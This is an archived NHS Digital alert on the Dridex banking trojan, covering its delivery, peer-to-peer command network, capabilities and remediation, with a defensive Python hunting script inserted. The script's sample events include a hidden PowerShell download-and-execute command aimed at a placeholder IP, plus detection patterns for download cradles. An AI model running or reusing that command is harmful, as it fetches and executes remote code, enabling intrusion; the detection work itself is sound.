Dridex Banking Trojan

This content has been archived

This article no longer conforms to NHS Digital's standards for cyber alerts, and may contain outdated or inaccurate information. Use of the information contained in this page is at your own risk.

Summary

Dridex, also known as Bugat or Cridex, is an information-stealing trojan that primarily targets financial records, banking credentials and crypto-currency wallets.


Affected platforms

The following platforms are known to be affected:

Threat details

Dridex is based on the Zeus trojan. It was first observed in 2014 and has gone through several iterations that added further capabilities.

Dridex is primarily delivered via spam email containing malicious Microsoft Office documents (mainly Word, Excel and PowerPoint). When opened, these activate Visual Basic for Applications (VBA) macros that execute PowerShell scripts to connect to its command and control (C2) infrastructure over HTTP and download the Dridex binary. Other infection vectors have exploited Dynamic Data Exchange (DDE) and Object Linking and Embedding (OLE) vulnerabilities, or have used other malware, such as Quant Loader, as a dropper. Once delivered, Dridex uses process hollowing to run itself within an instance of svchost.exe or spoolsv.exe to avoid detection. Dridex also has the capability to propagate over network or removable drives.
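The delivery chain above (Office document, VBA macro, PowerShell download cradle over HTTP, then hollowing into svchost.exe or spoolsv.exe) leaves a recognisable parent/child trail in process-creation telemetry. The following is an added example, not code from the NHS Digital alert: three hunting rules run over constructed Sysmon-style process-creation events. The event field names, the download-cradle substrings and the assumption that services.exe is the only legitimate parent of svchost.exe and spoolsv.exe are simplifications for this example; the sample events and the IP address in them are made up.

```python
"""Hunt for the Dridex delivery chain in process-creation events (added example)."""
from dataclasses import dataclass

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}
# Binaries the alert says Dridex hollows. Assumption for this example:
# their only legitimate parent is services.exe.
HOLLOW_TARGETS = {"svchost.exe", "spoolsv.exe"}
LEGIT_SERVICE_PARENT = "services.exe"
# Assumed heuristic: substrings typical of a PowerShell HTTP download cradle.
DOWNLOAD_MARKERS = ("net.webclient", "downloadfile", "downloadstring",
                    "invoke-webrequest", "http://")


@dataclass(frozen=True)
class Finding:
    rule: str
    pid: int
    detail: str


def _basename(path: str) -> str:
    """Return the lower-cased file name of a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def office_spawning_script_host(ev: dict) -> bool:
    """Rule 1: an Office application starts PowerShell (macro stage)."""
    return (_basename(ev["parent_image"]) in OFFICE_APPS
            and _basename(ev["image"]) in SCRIPT_HOSTS)


def download_cradle(ev: dict) -> bool:
    """Rule 2: PowerShell command line fetches content over HTTP (download stage)."""
    cmd = ev.get("command_line", "").lower()
    return (_basename(ev["image"]) in SCRIPT_HOSTS
            and any(marker in cmd for marker in DOWNLOAD_MARKERS))


def suspicious_service_parent(ev: dict) -> bool:
    """Rule 3: svchost.exe/spoolsv.exe started by something other than services.exe
    (a hollowed copy is created, suspended, by the malware process)."""
    return (_basename(ev["image"]) in HOLLOW_TARGETS
            and _basename(ev["parent_image"]) != LEGIT_SERVICE_PARENT)


def hunt(events: list[dict]) -> list[Finding]:
    """Apply all three rules to each event and collect the findings in order."""
    findings = []
    for ev in events:
        chain = f"{_basename(ev['parent_image'])} -> {_basename(ev['image'])}"
        if office_spawning_script_host(ev):
            findings.append(Finding("office_to_script_host", ev["pid"], chain))
        if download_cradle(ev):
            findings.append(Finding("powershell_download_cradle", ev["pid"], ev["command_line"]))
        if suspicious_service_parent(ev):
            findings.append(Finding("service_binary_unexpected_parent", ev["pid"], chain))
    return findings


# Constructed sample telemetry (Sysmon Event ID 1 style); not real captured data.
SAMPLE_EVENTS = [
    {"pid": 1200, "image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": '"WINWORD.EXE" /n "C:\\Users\\jo\\Downloads\\invoice.doc"'},
    {"pid": 1340, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Program Files\Microsoft Office\root\Office16\WINWORD.EXE",
     "command_line": "powershell -nop -w hidden -c \"IEX (New-Object Net.WebClient)"
                     ".DownloadString('http://198.51.100.7/x.ps1')\""},
    {"pid": 900, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\services.exe",
     "command_line": "svchost.exe -k netsvcs"},
    {"pid": 1420, "image": r"C:\Windows\System32\svchost.exe",
     "parent_image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "command_line": "svchost.exe"},
    {"pid": 1500, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "parent_image": r"C:\Windows\explorer.exe",
     "command_line": "powershell Get-ChildItem C:\\Temp"},
]

if __name__ == "__main__":
    for f in hunt(SAMPLE_EVENTS):
        print(f"[{f.rule}] pid={f.pid} {f.detail}")
```

Running the block on the sample events flags pid 1340 twice (Office parent and download cradle) and pid 1420 once (svchost.exe with a PowerShell parent), while the benign Word launch, the services.exe-spawned svchost.exe and the interactive PowerShell session produce nothing. In production the parent check needs an allow-list tuned to the estate, since some legitimate tooling also starts svchost.exe.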

The C2 infrastructure is a network of compromised devices that communicate with each other using a peer-to-peer (P2P) protocol. Nodes can be given elevated roles within the network, depending on machine build, up-time and data throughput, and then become responsible for coordinating the network. All communications between affected devices use a combination of RSA and RC4 encryption over HTTPS.

Once installed, Dridex attempts HTML injection into web browser processes in order to monitor the user's web sessions. It then steals financial information, such as banking logins, card numbers or cryptocurrency wallet details, that the user enters in those sessions. Dridex also has the following additional capabilities:

  • Transfer and execute files.
  • Bypass User Account Control (UAC) to escalate privileges.
  • Execute processes.
  • Monitor network traffic.
  • Take screenshots.
  • Record keystrokes and mouse movements.
  • Enrol the compromised device into the botnet.
  • Communicate with other peer nodes using the P2P protocol to retrieve configuration details.
  • Download and execute additional modules.

Remediation advice

To prevent and detect a trojan infection, ensure:

  • A robust program of education and awareness training is delivered to users to ensure they don’t open attachments or follow links within unsolicited emails.
  • All operating systems, antivirus and other security products are kept up to date.
  • All day-to-day computer activities, such as email and internet browsing, are performed using non-administrative accounts.
  • Strong password policies are in place and password reuse is discouraged.
  • Network, proxy and firewall logs are monitored for suspicious activity.
  • Passwords for user accounts that were accessed from infected machines are reset from a clean computer.

Last edited: 11 January 2022 11:28 am